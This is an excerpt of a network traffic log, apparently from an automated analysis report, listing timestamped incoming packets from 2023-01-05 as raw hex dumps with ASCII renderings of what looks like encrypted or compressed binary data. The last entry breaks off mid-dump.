2023-01-05 12:18:10 UTC	802	IN	Data Raw: c9 ef 27 f1 92 d2 9f f7 f1 49 6a e4 9e 9b e7 4a 70 6f 88 d5 12 57 8e 3a 03 ad ea dd e9 c4 cc 09 a1 49 cd 32 e6 84 8d 12 d4 cf 99 3c e6 27 4b 42 f5 7d 1f c5 56 ef ce 1f 9d 8d 1b d6 6e a5 5e 0d 25 3f c9 ac 30 e8 e5 c0 be 50 d1 b6 76 18 2e 45 6c f0 e6 ef 8f 43 60 98 ec 74 1b 8a 1d 6f d9 bf af 18 ec 7d 3d 7e 30 9c a8 3c a4 10 07 6b 86 74 9c 05 d6 86 d1 45 2d 56 ce 6a d1 a9 2d c8 9b f1 8f ce 24 da c1 67 71 9d 81 9c 05 14 7b 3a 4d b2 59 e0 97 6a 8e 5d 96 68 bd 2a 2a c8 03 37 06 c9 84 6d 89 c7 32 61 f5 40 9c c9 b9 23 57 ff e6 76 36 aa 80 4c d1 dc 9b 92 94 f0 61 42 65 fd f0 53 ef 2d 78 3b ac a7 d5 07 5e b3 88 5b 57 53 28 df 83 7f f9 b5 82 ca 79 86 32 61 cc fd 15 2a 47 0f 5a 44 f2 16 39 c7 24 7d 93 4e 6f 22 a6 c9 f4 d1 10 da f0 2d 1b 58 57 e1 e8 29 c0 50 75 bf 25 Data Ascii: 'IjJpoW:I2<'KB}Vn^%?0Pv.ElC`to}=~0<ktE-Vj-$gq{:MYj]h*7m2a@#Wv6LaBeS-x;^[WS(y2aGZD9$}No"-XW)Pu%
2023-01-05 12:18:10 UTC	803	IN	Data Raw: 11 e8 f6 c7 89 46 d0 75 68 c3 8a ac 6c 54 66 54 18 65 e3 2d 09 2e 9c 0f 28 3e 24 a0 13 b4 ab e0 c7 28 c9 06 9d af c2 31 88 bc 05 85 c1 ae d4 69 48 5a bc 94 10 b8 45 a3 d6 ff a7 fc 4f e0 7a 89 c5 8c 66 1c e8 6d 1c 2c 6c 7b 6a 68 ee f1 9a ce 02 57 10 70 c7 96 bd e3 61 63 d2 1f 8c 33 41 30 aa 72 8e 21 42 95 71 1a 08 91 00 bb 11 f0 64 c2 e6 bf 20 38 4e fb 82 91 c5 fc 2c a2 e4 3b 2a 46 a7 21 51 1c 2b 01 17 21 b0 f5 47 fd 07 b8 3d 7d 39 63 8f e8 cf cf 78 7e 3a 0d cd cb d5 25 30 72 99 82 95 d7 e5 c3 a1 dc 8a 22 cf c4 b0 70 b7 10 d6 d0 96 61 2b 09 ec 20 c1 e6 af 5a 75 1e e6 57 d9 c1 a8 71 41 51 81 c2 88 51 e8 34 24 43 7b 49 90 a3 10 c9 8f 0c 7a f9 6a 47 2b 59 46 be 4f a5 ac 32 0e e9 03 b4 5e a4 33 de 14 75 86 91 63 54 08 79 8a 78 69 14 86 2c 93 d3 64 45 68 96 4b Data Ascii: FuhlTfTe-.(>$(1iHZEOzfm,l{jhWpac3A0r!Bqd 8N,;*F!Q+!G=}9cx~:%0r"pa+ ZuWqAQQ4$C{IzjG+YFO2^3ucTyxi,dEhK
2023-01-05 12:18:10 UTC	819	IN	Data Raw: fe 42 5a 27 7f e8 d9 3e af 4a 49 02 47 54 e6 58 3c 5f 59 d0 7b 8c 9a cc 5d 5f 2d 73 9b a3 86 df 7a 7f 2c c7 2b b4 81 7d c7 ef 83 25 63 b7 0f c7 6b bc 07 f9 35 be 6a 48 b8 74 7a 0d 21 ba eb 6c de 0b 0f b1 3f 2c b9 b3 51 0b 15 68 2c 57 ca 62 1c 16 66 e1 9f 29 38 32 98 70 e1 e5 7c 23 f6 94 88 20 bf 0f c6 21 24 1a ff de 02 87 90 a5 f8 df be a6 ec 63 85 c2 c6 6c 96 c6 60 fc 93 3c 4e b9 42 a2 bc 0f c1 37 94 67 79 bb 43 d7 13 ad 05 b0 3e 1e 12 b1 97 95 97 55 62 29 f1 0d 4b 16 09 c3 69 9f 50 6d f7 49 17 bc f1 eb fb 6b 50 60 6d 56 ca a7 76 97 98 b1 5e 65 c1 3e db 6e 43 51 16 10 28 79 33 e9 0b b2 9d 07 95 a1 0e 3c 4b b1 49 bc 6b ea 23 e7 41 c7 be 3b 04 59 ea dc 4c cc a5 6f 09 09 8b 8f d7 93 62 3a 98 10 7a ae b9 bd 1c 66 5f 99 26 88 08 b6 04 d2 38 9a 40 1a 6b 81 ba Data Ascii: BZ'>JIGTX<_Y{]_-sz,+}%ck5jHtz!l?,Qh,Wbf)82p\|# !$cl`<NB7gyC>Ub)KiPmIkP`mVv^e>nCQ(y3<KIk#A;YLob:zf_&8@k
2023-01-05 12:18:10 UTC	820	IN	Data Raw: 01 bd 7a c5 33 5c 89 2b 66 b8 f5 bd d0 63 c2 90 25 25 b0 a3 a8 04 97 7e 44 7d 68 39 2f 8c 99 f1 c1 a9 1b 04 b5 8e ae 2f 01 ac 83 80 37 37 64 ac 0b 93 76 dc 2a c3 6c 10 a9 cb 13 75 67 e8 28 01 8c 40 c0 da af 0f 7c 83 90 e8 13 8c f4 e6 97 66 0e 51 13 ab 21 92 0a ae e3 52 53 7b 5c a7 a7 f0 7a 51 4b 46 88 0b f5 6e 83 66 ea ea 3e 4b 02 38 0f 01 b3 44 8d 6e 08 2d 07 1c cf c1 2c 8c a9 6b 14 75 54 d8 24 01 44 ef 2c e8 f1 a2 c1 3b 58 91 2e 74 25 b3 a7 89 b7 24 1a e1 e0 84 04 36 e6 17 9d f1 e9 e3 7c 15 19 c8 01 f4 9c 68 be f7 da 98 ad 10 19 22 33 b4 7a b7 39 8c 83 fe 13 63 fd e1 74 eb cf bb 21 c7 98 fa 25 39 78 59 6c 4d 1b 8e 83 fc 1d 15 d5 e0 d3 cf ee 63 39 38 a7 7e 13 05 d5 8a bd c8 6b 77 60 16 9e 6a a7 39 25 91 72 3e 5e fd f0 01 6c b3 fa 68 30 5b 76 94 25 30 52 Data Ascii: z3\+fc%%~D}h9//77dv*lug(@\|fQ!RS{\zQKFnf>K8Dn-,kuT$D,;X.t%$6\|h"3z9ct!%9xYlMc98~kw`j9%r>^lh0[v%0R
2023-01-05 12:18:10 UTC	836	IN	Data Raw: 84 46 1b 52 17 56 74 f9 29 4a 06 69 3b 87 e7 c4 35 4b 93 fd 40 3d fe 55 5b 46 14 d4 a8 34 f1 2b f0 f8 1a a9 e6 6b 25 02 df 01 49 ad e3 29 78 93 e7 81 90 7d 3d 3b c5 a2 54 fe ba 84 66 02 3e 51 9c e7 9a 04 b2 01 42 6e 4c da 5c 07 8e 0f 48 64 22 bf a6 53 25 64 11 e0 d2 71 9e 57 d2 fe ff 40 2b cf b9 bc 95 67 07 ce 49 ad 94 16 2c 5b 7c 42 32 60 8a 7b 69 07 ac ec 3d d9 01 3b f5 1d ed 1a eb c2 85 12 0e 91 29 ae 6d f3 77 66 2a 17 9e 3b 56 a4 da b1 4d c5 f3 63 d5 cf 4d 5a 43 ff 47 bf 98 98 0d a1 aa 04 3f 01 ff 50 32 95 ef b1 f8 37 a5 b5 46 e4 56 87 c7 28 d3 d5 85 52 37 52 c4 01 bd ca e0 db f0 ba 90 6e eb 3a 11 07 da a2 b1 b1 80 8d fa f2 60 df d1 55 9c d2 cf 92 cb ac 09 6f 76 c1 a2 21 8d e5 e2 3c 1e 49 63 1f f0 ac 18 72 69 7f 3a 98 b8 bf 6a 5f 31 5c 80 59 2f 5c d2 Data Ascii: FRVt)Ji;5K@=U[F4+k%I)x}=;Tf>QBnL\Hd"S%dqW@+gI,[\|B2`{i=;)mwf*;VMcMZCG?P27FV(R7Rn:`Uov!<Icri:j_1\Y/\
2023-01-05 12:18:10 UTC	837	IN	Data Raw: 58 74 d9 25 58 12 75 a8 96 18 2e 8b 2a a1 96 00 97 85 f3 2c 90 c0 7d 7d 8f 61 34 4e 5b b6 82 3e b4 6f b2 18 ce 5f 6f d1 13 18 7f c2 50 12 98 83 08 d3 6e 87 cf 13 d0 9f 2e cd 58 7f 65 50 25 c4 09 6d 65 e0 3c e7 24 70 23 11 ce 92 21 60 0b d4 ab bc 36 5a 0c 97 55 95 60 17 e0 b2 72 9e 67 12 b8 3a 08 d7 71 fe fd fb 90 b2 50 39 48 0c 17 a9 4a a8 20 c0 45 72 9e 64 09 5c 7a 84 1b 90 b7 75 14 e8 fa 86 36 16 c3 65 57 25 b8 05 b8 ec 9c 27 f4 91 44 fe 7d 47 e0 c6 0d 8d cd 0e a3 da e8 19 35 57 26 55 42 49 01 2e 13 e7 c9 25 81 5b f9 ce eb 59 43 d8 f5 6b e1 e4 e5 c8 ae 79 14 e9 8f 31 53 78 f0 3b 61 5d cf d9 a9 54 37 2c 11 b3 f8 61 1e 09 43 97 7e 94 96 a1 07 3c 92 65 e8 42 ef 84 85 f8 b2 f6 6b 3a ac 0e 57 17 a6 c1 60 ec ce c7 56 55 cf 41 bb 91 1d 99 f9 1f 68 d6 a3 c5 23 Data Ascii: Xt%Xu.*,}}a4N[>o_oPn.XeP%me<$p#!`6ZU`rg:qP9HJ Erd\zu6eW%'D}G5W&UBI.%[YCky1Sx;a]T7,aC~<eBk:W`VUAh#
2023-01-05 12:18:10 UTC	853	IN	Data Raw: db 5a 4b 40 7b 13 50 7f f4 ae bf db 3e 3f 4d ca b6 58 bd a4 31 b3 a0 38 b0 f2 41 bb 72 b7 85 c9 51 d5 ba 8a 79 df 5f 50 41 24 65 48 25 1f 69 a1 9f a4 85 74 08 7f 3a 29 fe 0c 28 fa 6a 18 05 90 bf c0 15 11 a9 5c e1 cf 79 a6 49 c0 6f 60 40 1d 1d 6f 88 90 ac 8c 51 86 26 65 24 ad f9 eb fe c8 cb b4 65 c8 50 e0 b0 48 81 6f 5b 88 da f2 52 07 0a af 84 19 9f aa 16 14 b7 6a 10 8d be fa cf 15 7f 7c ea 39 31 29 f2 0f 37 18 38 cf 1a 09 42 55 50 ce d7 26 9e c5 8d 34 cf 60 bd 46 d4 68 6e c4 55 6b bd cc c7 d4 ad bd b6 06 3d ad b0 6c 43 28 aa c7 1a fc 75 89 17 b0 8a 1c 9e 71 1d 45 55 bc fc 49 aa d0 13 e8 f8 55 9b f9 2d 60 bb 39 0f 03 7d fc a7 a0 cf 3b dc 6b 0b 3f 62 0d 4f 31 b9 79 f5 9e 43 11 69 d9 4e 97 5e 96 ed 7a a3 ea 3e 76 56 97 1e 70 fc 47 3c 63 12 a3 25 28 52 a3 a5 Data Ascii: ZK@{P>?MX18ArQy_PA$eH%it:)(j\yIo`@oQ&e$ePHo[Rj\|91)78BUP&4`FhnUk=lC(uqEUIU-`9};k?bO1yCiN^z>vVpG<c%(R
2023-01-05 12:18:10 UTC	854	IN	Data Raw: 4f 0f 09 dc b5 9f 42 88 9e f3 75 e6 1a 91 4f 1e cc fd d5 57 c2 27 e3 32 a6 e5 93 0b 19 65 f9 64 38 06 95 a3 db b8 59 c7 8b de 90 ae 4f 2e 71 5c b9 56 d8 20 0a 67 3d fa ad de 83 0d 7e df bb a6 82 a4 c1 27 32 0d 5a 33 c9 36 18 fe d3 ab 53 f2 55 b8 c8 ea f1 8b e6 c4 2b 4e 8f 36 6f 2f de ed 48 4d b7 5f bf a9 34 96 83 92 df 67 8e 80 c9 5d 83 d3 c3 dd a4 6e 6d 1c 4e f0 db f1 7a 33 e7 b6 bb a1 5d c7 75 35 20 db a1 ef f7 5c 9c 13 4e 64 78 d2 dc e5 80 74 ee c1 db 9c 68 98 fd b7 c4 0c 3b 30 85 8d 10 c9 12 63 9b 7c 23 bf 6b 29 79 a3 16 4c 45 57 8f ac 50 8d c8 bb 2c a4 9c 43 c5 4b fc 28 d9 57 45 17 5c f2 3c 45 c1 27 72 a0 ce 2f 2b 51 d5 bf ea e7 56 35 0c 8e 6d 32 43 3c 7c fe fc ee 66 d4 d3 0c a8 76 eb 6d 7a 6e e4 6d 8c 4b 66 62 07 33 00 0f a1 3c f9 83 f9 f3 2f 1f 93 Data Ascii: OBuOW'2ed8YO.q\V g=~'2Z36SU+N6o/HM_4g]nmNz3]u5 \Ndxth;0c\|#k)yLEWP,CK(WE\<E'r/+QV5m2C<\|fvmznmKfb3</
2023-01-05 12:18:10 UTC	870	IN	Data Raw: 4c 27 16 62 1e ba 62 9d b5 43 dd a7 98 de 18 d4 38 85 69 19 85 fa ce 98 f6 63 9e f8 3b ea 6f c3 7a 34 a3 76 06 de 7b 30 a6 b1 6b 41 fc 89 7f 5f 83 e9 ec 80 e5 7f 10 cb 60 2c 6a 1e c3 3a aa 84 d7 36 44 ee 26 ea 8e c1 7b 3a 61 d9 45 60 fe 3f 63 1a 46 e1 e7 cd b1 8c c6 63 b9 0d c3 f2 72 43 bd 5b 98 86 38 cc f3 2c fc fc 28 96 dd 50 d4 9a 85 e9 39 86 69 39 8e f5 f3 53 51 b5 51 76 c7 7b 35 41 2e 1d f3 ba 1f cb a3 36 e6 e3 28 96 ad 33 96 83 0b e6 37 0f e6 fb 26 a6 ab 25 de f3 2b fe 6e 87 f7 0a c7 fc be c7 f4 1e c7 6b de 54 94 a4 2a 58 9e a9 c8 2d c6 eb ae 62 ba 3d f0 3e a3 4c 92 12 97 a5 31 d9 01 7e 79 a1 9d 0c c6 3c 1c 44 fb 98 89 bf 4f 44 b6 2f 96 61 4b 4c 4b 7d cc 43 2c 7e 56 0d cb 6a 24 32 d9 58 26 e1 78 af 8b 98 f6 83 54 a6 98 8f cd f8 b7 20 0f 75 e6 f3 24 Data Ascii: L'bbC8ic;oz4v{0kA_`,j:6D&{:aE`?cFcrC[8,(P9i9SQQv{5A.6(37&%+nkT*X-b=>L1~y<DOD/aKLK}C,~Vj$2X&xT u$
2023-01-05 12:18:10 UTC	871	IN	Data Raw: 19 04 d6 8d d8 3d be f9 17 42 2b e7 e7 dc e2 b1 97 d6 2a 5b 2a ad d2 0b 67 24 02 7a fe 0d 1d ff 5c e8 4d 63 c8 2a cb 9f 72 14 a0 59 63 35 25 c5 01 4c 8e 12 d0 19 84 da 3b 77 8e 86 ec 35 23 f5 8f 87 8d 4d 34 54 35 c9 66 39 26 d9 04 a7 28 82 4a 4b 52 29 57 ff 97 a2 d0 f2 5b 9e 3f f4 2a f3 54 6b b6 75 8a f3 70 9a 22 b0 46 62 77 3b 4d a8 0f bd 0e 57 e5 3a d4 12 aa 15 69 29 88 c8 49 41 09 26 4f 12 54 ce bc 46 95 8f 57 92 f6 41 54 cd bd dc e1 31 eb 6c ad 2a 34 47 60 1d 93 97 0b 02 19 24 f0 7e fc c0 08 98 94 b8 25 43 2f b0 cc 90 1a a3 ab ba 65 4c de 23 b0 d1 c4 6e f9 ab 4f 6d 30 b5 39 c1 ed 1c fc d1 90 da 8a d6 d0 93 ab 2b f7 fd 91 c9 e7 05 d6 9b d8 cd 3b c6 ec 82 29 03 86 70 3d e2 0e 83 af a9 86 82 ed 60 f2 03 01 bb f5 8a 8c b6 70 dd 09 b0 a6 50 c3 d1 7a ac 8d Data Ascii: =B+[g$z\McrYc5%L;w5#M4T5f9&(JKR)W[?Tkup"Fbw;MW:i)IA&OTFWAT1l*4G`$~%C/eL#nOm09+;)p=`pPz
2023-01-05 12:18:10 UTC	887	IN	Data Raw: 91 52 14 7c c9 b2 98 8b 4f f3 22 35 ef fe 2d 32 cd e6 fe ed 92 3a c0 0e 35 9a b4 25 1c 9a 74 9b d1 b3 d6 53 37 1d 29 17 b1 07 42 93 f7 d7 cb 3f 7c 4f 83 34 6e c8 12 2e 70 e7 81 30 70 1a b3 70 56 fe e1 82 3a a6 e5 8d 63 70 bd a6 5d 6e 40 9f fd 5b a3 9b fd 7f ef ce fc 0e 35 5b 29 f3 7c 34 1f 42 68 5d 85 c8 48 6a cf 5e 6b 4c 26 ae 8b cc 69 36 8e 31 6d 77 91 3d cd c6 f1 f3 86 7f 86 bd ef 36 b9 e7 1b 42 e8 30 d7 86 c7 bf 4a 21 84 98 18 42 c7 b1 49 2f e3 8b 9a 96 fe 15 f9 c9 4d f8 50 5c 10 22 24 3f ae b1 b9 ee c7 a3 ad ee c7 d0 e3 a5 d3 10 3f 57 1f 57 13 3c 1e b6 ad 96 68 84 31 cf c3 5e 43 f3 66 a1 4d 4c a2 01 b6 a6 ed 79 0c da 65 cb d2 e9 e6 a0 9f 4b 58 9a 8d 26 a2 c0 6c 93 83 04 e1 53 61 41 b8 1f 20 08 3b 71 6c 07 ba cb b7 ea d6 7a cb b7 e6 06 86 08 42 c1 30 Data Ascii: R\|O"5-2:5%tS7)B?\|O4n.p0ppV:cp]n@[5[)\|4Bh]Hj^kL&i61mw=6B0J!BI/MP\"$??WW<h1^CfMLyeKX&lSaA ;qlzB0
2023-01-05 12:18:10 UTC	888	IN	Data Raw: a3 a2 29 23 9a ab 71 34 0d 89 e6 ee c0 35 0d 61 f0 02 17 c6 4a 6e d1 58 a6 e7 9d 0d 16 d1 dc 8a a3 70 24 8a 0b 95 2b 8b 30 2f f4 4a a8 9a 22 56 63 d9 c1 77 58 ac 68 ee c5 11 1c 20 f3 f3 de fa 29 b7 60 f0 a6 66 8c e1 26 41 63 99 98 b7 0c 09 a2 79 08 47 31 84 28 ce e9 b7 36 06 8f a9 bb 19 c5 ab 99 c6 f2 5b 5e 8a 66 a2 79 1a 47 51 83 28 8e 17 9f 28 c2 96 09 17 19 ff 87 70 a6 41 cf ab 1a 34 1c 27 13 47 f3 9e 4c cc 01 27 ef e8 e1 5b 97 d2 4c 50 a4 8e 1a cb 31 be 35 3a 8a e6 dd 1c c1 16 22 b8 77 33 ea 09 ec d9 b9 72 b9 9a a0 32 53 8e 87 aa 72 54 16 cd 97 38 9a 44 a2 09 df bb 71 31 1c 32 1e 60 82 70 57 d1 58 ae f3 e5 a8 22 9a ff e1 08 7e 24 82 72 f3 7e 28 0b a9 65 fe 65 16 9c 68 8d e5 1e 4f 10 2d 9a 1d 07 b0 04 ff 90 39 59 e7 7f 7c 11 ac 75 4c 61 8c ed 71 1a cb Data Ascii: )#q45aJnXp$+0/J"VcwXh )`f&AcyG1(6[^fyGQ((pA4'GL'[LP15:"w3r2SrT8Dq12`pWX"~$r~(eehO-9Y\|uLaq
2023-01-05 12:18:10 UTC	904	IN	Data Raw: aa c1 99 cf 1f b8 a0 18 9c ed 6e af 40 d7 a8 d2 d4 3d b4 63 11 d9 89 66 4a 4e 34 7f d1 bf ef f6 3a 68 b4 dd ac 86 3e 9f 65 b7 d5 1c a9 de 7e 4e 4a 11 0d 67 e6 4c 48 51 e9 8f 35 a5 56 c3 73 96 a1 4b 86 56 73 29 d5 8d ae e1 10 a6 71 a7 4b 4e f6 f7 31 d3 d1 e3 3e 51 fe 34 b7 67 74 3a 7a 59 dc 7d ad d9 db 8f 9f 14 5a 90 3a 59 ac 99 d2 e7 ed d0 1d a6 c0 b2 95 f4 2f b6 90 54 5c 4e b1 ca a0 df e1 95 d5 a8 db c2 6e b1 9b b9 8a b8 92 a0 bb 41 df cd ec 99 81 2f aa dc f8 b8 6d 35 f2 af fd 5c be 85 c8 18 38 47 5e 2e d9 a4 d4 b8 10 77 a4 fb a0 4d 17 68 59 94 36 3d fe 27 99 4e 29 d8 77 dc ce 53 0e 94 f8 4a c3 1f 37 35 39 62 13 88 a7 ee 7f 2f 7b dc 51 b0 3b 18 5b 64 f3 ac 40 3a 13 5b 51 9a ce 4c 24 2f f1 f0 bd b0 0a 36 80 b1 9d 2f b5 4b 40 de 37 7a 28 77 b7 cd 93 96 78 Data Ascii: n@=cfJN4:h>e~NJgLHQ5VsKVs)qKN1>Q4gt:zY}Z:Y/T\NnA/m5\8G^.wMhY6='N)wSJ759b/{Q;[d@:[QL$/6/K@7z(wx
2023-01-05 12:18:10 UTC	905	IN	Data Raw: 9d 1e bc 4d fa f1 5f 2a f9 45 29 56 c6 df fa d2 cf ae 2f b3 ed fa b2 61 c8 96 b3 6c 05 ad 9b 07 3f f4 a7 77 4b df ce f6 a6 13 49 fa 55 a3 c1 83 b3 64 f3 a1 a8 c7 ee 9f f9 e1 91 bb 43 77 0c a5 ab 21 13 d7 79 53 c8 81 35 cf f8 19 66 1f ea 58 ce 3a c0 ec f7 7f 4e 7c ad 10 a7 64 38 57 0a 14 21 a6 b0 b8 ce 89 05 8a 5f 3b d7 c5 a8 5e e8 8b 9d 54 d3 70 f2 41 fc c2 90 6c c9 5f ac c0 a9 ef 98 f2 f4 b8 5b f7 8a f1 e5 20 39 97 fc 69 05 74 af cd bb cc e4 16 94 21 26 7e 49 29 bf e4 2f 17 1e 66 3d bb fa 18 9d 59 bb c4 27 7e f7 6c b2 e4 2f b7 e1 e5 0b cd 52 82 72 fe 7c 7c 29 fe 2c b1 cb 92 3f 2f 3c a4 6f 37 67 79 d0 fe 54 23 13 cb ce 32 5b 92 6d ab 82 4c c7 c8 cc 15 97 dc a0 af 8f 6b 0f 8b 5f 04 43 14 ec 0d ce 7d 02 c6 59 83 e8 55 c3 5a 77 e2 17 b2 70 05 1b 6a cf 7d 0c Data Ascii: M_*E)V/al?wKIUdCw!yS5fX:N\|d8W!_;^TpAl_[ 9it!&~I)/f=Y'~l/Rr\|\|),?/<o7gyT#2[mLk_C}YUZwpj}
2023-01-05 12:18:10 UTC	921	IN	Data Raw: 24 37 45 a0 f9 c7 05 13 37 51 98 06 0a 5b 2f 66 9b 72 7c 49 6b 2a 38 66 8f b4 f9 37 8d c8 2a a6 da a4 24 0d 46 23 0a b4 38 43 0b b6 1a 92 8f ee dd 7a b2 4d 2a c8 40 93 d1 5a 09 c6 ed 21 8c 6a 20 ef c3 52 e0 1f c6 71 c0 fc 78 ce 4c 09 1e 77 9d e8 f8 e5 9d fa fc 8b e8 cc 9d c8 aa 14 e8 6e 86 26 fc 61 cc 45 86 46 19 e5 26 a8 22 b6 e5 64 8a 93 8a 2a f8 f4 6a 05 3f 84 f1 6d 2b 2e ac 4a b3 53 99 e4 ab d4 f3 8b 69 7c b7 32 6e 6e 52 e3 e5 e7 0b d0 15 9e a2 cc b3 c9 b3 78 76 f2 4c e9 2d 5f 4d d1 48 f8 38 e4 a2 85 9a 28 36 e2 a3 1f 0a d5 93 b1 7c 15 4c a9 a2 e3 e9 5a b6 80 6c 12 55 63 50 3d 57 e7 39 1a 83 23 5a e1 58 ca 1c 93 1e a7 a9 45 a7 26 e7 90 25 67 92 18 9a b9 a5 8c 6b 97 49 b0 6c ed b8 4c e0 cb 04 ab fa b5 7c 45 99 33 3c 93 ef bc 1b 6d d2 1f ed 88 b3 cc d1 Data Ascii: $7E7Q[/fr\|Ik8f7$F#8CzM@Z!j RqxLwn&aEF&"dj?m+.JSi\|2nnRxvL-_MH8(6\|LZlUcP=W9#ZXE&%gkIlL\|E3<m
2023-01-05 12:18:10 UTC	922	IN	Data Raw: 69 eb ac be d2 1e 32 12 6d b1 c4 d6 16 64 b6 cc 56 a0 fd 19 1a 3c 6b c3 14 1a df 78 89 f4 14 50 7e 31 88 9c 67 83 e6 37 5b 36 28 d0 32 0c 2d d3 79 54 08 65 9f 3b 34 85 23 74 a9 5e 03 91 ba 2d 35 5b 8e 28 d0 d8 a1 80 16 78 99 f2 28 bd 9c 9b 56 ba 1d bc a8 28 f0 3a db 57 8b 62 c0 ac 40 8f 32 74 6d ef a3 65 a8 e4 eb 10 79 e8 1a 23 66 b1 7e 1f af 8d e1 ed b5 0a c1 28 26 28 55 bb dc 61 4a 32 e2 c5 5d 89 60 bc d8 b4 27 4c 70 81 e3 d4 35 1f 8e 3d 25 33 79 32 d3 86 ba c1 d5 e9 d2 c8 58 39 ad 70 12 b7 85 ff be 68 0e 46 90 49 c1 7f 09 04 fe d1 9e 65 87 a8 52 f6 d2 f2 10 a0 a0 d8 38 21 65 7b 05 d1 f5 45 14 8e 6d cc 31 f6 c5 7c 67 f2 8d ee 2c ed 74 fb ac cf 1f 38 9e 3a fc 6c b6 78 29 f8 fe 8c 1f d9 f0 b0 2b 05 bd 3e 27 4f e4 df 46 1d a2 1c 34 f3 36 5f 78 ae c0 4b 32 Data Ascii: i2mdV<kxP~1g7[6(2-yTe;4#t^-5[(x(V(:Wb@2tmey#f~(&(UaJ2]`'Lp5=%3y2X9phFIeR8!e{Em1\|g,t8:lx)+>'OF46_xK2
2023-01-05 12:18:10 UTC	938	IN	Data Raw: 6d 8b da 46 e6 d1 d9 d0 c1 e9 7b 7a 87 b7 51 86 75 12 27 77 23 46 5d 30 46 ce 03 3c d7 9a 3b f2 00 38 8f 76 f5 23 8c 30 59 42 5e c9 0f 17 26 9a ee 2a d3 1f 44 fd d6 a6 b7 17 82 d9 ef d6 f4 9d 9d 4e e6 0b 31 d4 54 0d 2a 1d 66 11 60 8c 89 c8 b8 b2 6b c2 2b e8 ed da 92 0e 88 6c 99 83 f4 33 8b 7f b6 18 5e 45 8c d6 00 69 bd d7 8f f7 83 2d ed cf fd 47 68 71 72 9e 2a 9d 19 27 fe cd 57 ef a8 3e f5 be d0 f7 72 be 94 0a 05 56 35 68 a1 c7 34 f9 9a 55 d1 a7 61 91 5e a6 ff 0b f5 b7 2b 0f ef 09 ef 5f 14 d3 29 72 de c2 b8 f0 99 56 fb f3 f8 7c 81 c9 47 a1 dc 47 d3 a5 23 6c 1a 79 2e 8b c8 eb 95 33 56 39 86 8a 9f bc 67 af 87 b5 55 18 cd 0a 69 ff 6b e0 dd 01 fe 78 1e 16 ae 1e 5e fb 8c 0d 2b f7 8e 7d 3a fd af 4c 7a 37 45 48 33 9b cd dc 0f 55 16 3c a5 b1 0b fe 32 9e 49 69 07 Data Ascii: mF{zQu'w#F]0F<;8v#0YB^&DN1Tf`k+l3^Ei-Ghqr*'W>rV5h4Ua^+_)rV\|GG#ly.3V9gUikx^+}:Lz7EH3U<2Ii
2023-01-05 12:18:10 UTC	939	IN	Data Raw: dc ce a3 0c a3 a1 63 6d ed 78 42 da 4e f7 e3 cb 2a d2 76 f1 9f be 2a a5 a4 b9 48 ea 70 af af 17 24 af 1e f7 80 90 7e 96 db 96 b1 24 d9 47 49 09 7e 16 2b 5c 13 46 73 40 da d9 3a 56 95 a0 9a dd 42 ba c2 55 97 77 d4 15 0c 2d 3f 99 5b a6 3a 3a db 0c 97 76 4b e0 36 5b 87 bc 86 d5 6e cd e9 0d 5e 6d 59 ae 58 59 30 6b a3 c1 c5 f4 61 a8 4f 7e 79 c6 17 6a f6 7b 4a 12 67 27 93 67 52 7e 4a 23 59 25 eb f4 e3 19 45 87 94 7d 71 0d b3 60 a3 6f 18 b9 2e d9 60 4c b9 23 cd b6 0d 62 3e 31 a9 16 a5 fe 2e 16 a5 60 3f d4 8a 24 89 cd 32 3a 14 fc f5 59 96 b0 bd 18 23 25 1e 83 3b ee 5c 0b 80 a6 33 ba 92 8f 08 37 a6 df 90 e1 5f e1 62 f2 f0 ef 47 a9 cd e5 d8 86 30 65 e8 4e fa 72 a6 99 8c 8b d0 d6 d4 56 23 7b 78 33 31 48 ce 30 ce 30 e4 2c 1e 00 b7 c0 a9 49 f4 2b c2 19 ab dc fa dc 50 Data Ascii: cmxBNvHp$~$GI~+\Fs@:VBUw-?[::vK6[n^mYXY0kaO~yj{Jg'gR~J#Y%E}q`o.`L#b>1.`?$2:Y#%;\37_bG0eNrV#{x31H00,I+P
2023-01-05 12:18:10 UTC	955	IN	Data Raw: 0b 8c eb 9b bf 29 14 2a 15 37 db 6a 16 2d 56 28 95 7e 66 2d 11 02 0e 55 89 86 66 03 13 8a 89 36 2b c4 96 9e 3a ce 6c 0b 37 19 c2 c0 49 7d 04 ac 57 ab b0 08 47 60 11 5c 86 b5 fe ad 4e a9 7f 7d dd 15 fb 3e ba 93 f1 20 4d de 30 4c c4 e7 3d 26 aa 15 86 35 d1 2b c3 4e 1a 9e 4e 40 9e b1 f8 77 69 7c 77 c7 ef dd 90 a6 3a d2 64 27 c7 0b f8 9c 46 1a 0f bd e2 61 6d 2d 7e b7 22 6d 10 d2 06 a3 56 ca d2 70 75 29 2d d6 66 72 2b 50 0a 5a f6 1c 7d 4a ad c7 74 c1 91 bc 81 56 b6 e6 68 14 f7 28 99 66 fa c6 e0 f8 00 65 1a e3 73 60 dd 72 6a 48 bd 0a 76 ba ce 74 35 3b 89 50 1f ff 15 7f b9 47 d4 57 5a dd 48 fb b5 f7 44 7c b9 43 a3 a5 0c f1 58 2a e8 39 92 d3 35 83 2d 0d b2 b0 d6 1d 58 24 6a a3 28 41 a2 b4 45 23 8a 85 3a b3 20 65 19 58 27 e7 37 ca 33 72 58 bf aa 14 c5 94 bd 39 3e Data Ascii: )7j-V(~f-Uf6+:l7I}WG`\N}> M0L=&5+NN@wi\|w:d'Fam-~"mVpu)-fr+PZ}JtVh(fes`rjHvt5;PGWZHD\|CX95-X$j(AE#: eX'73rX9>
2023-01-05 12:18:10 UTC	956	IN	Data Raw: b8 46 cc 54 ce c3 b5 1a 56 b3 35 29 3d 8b 4b 7f 66 32 e2 21 ed 70 a2 f3 5f ce 75 fe 89 ba d0 0b 47 ba 5f 81 77 73 f2 32 a3 2a 77 5d ee f2 1e 34 b4 0d cc c7 ea 75 bf bc 3c 49 d2 44 e1 ec 91 86 93 9e b0 2f ec 86 fa 60 d6 1c 99 24 c9 41 42 a4 5e 70 bb a2 87 fa 80 65 1f 24 31 46 c2 95 e8 dc 8d 35 7b b4 6e 0a a7 3a a9 e6 47 23 ef c9 7b 2b 63 c2 1f b0 49 8d cc 97 36 a9 1d f2 39 4d aa 07 99 de 9f c6 36 42 91 48 de 16 4c 3a 23 ff 4e 4a fd 1d 51 f6 cf 36 a1 bc 2e 6f e4 c2 f1 ed 29 af 33 d2 84 c3 b5 0f 8d d9 03 83 95 d5 46 7d 90 db 02 7d fc 2d ea 24 e5 d9 b7 b2 96 ef c3 f5 c4 0c 2b ec c2 f1 0a 99 17 d4 ea f1 ac 02 2d 2c 4c 38 5d b5 8b 08 79 97 d4 aa 0a 4d e6 9d ec 65 83 f2 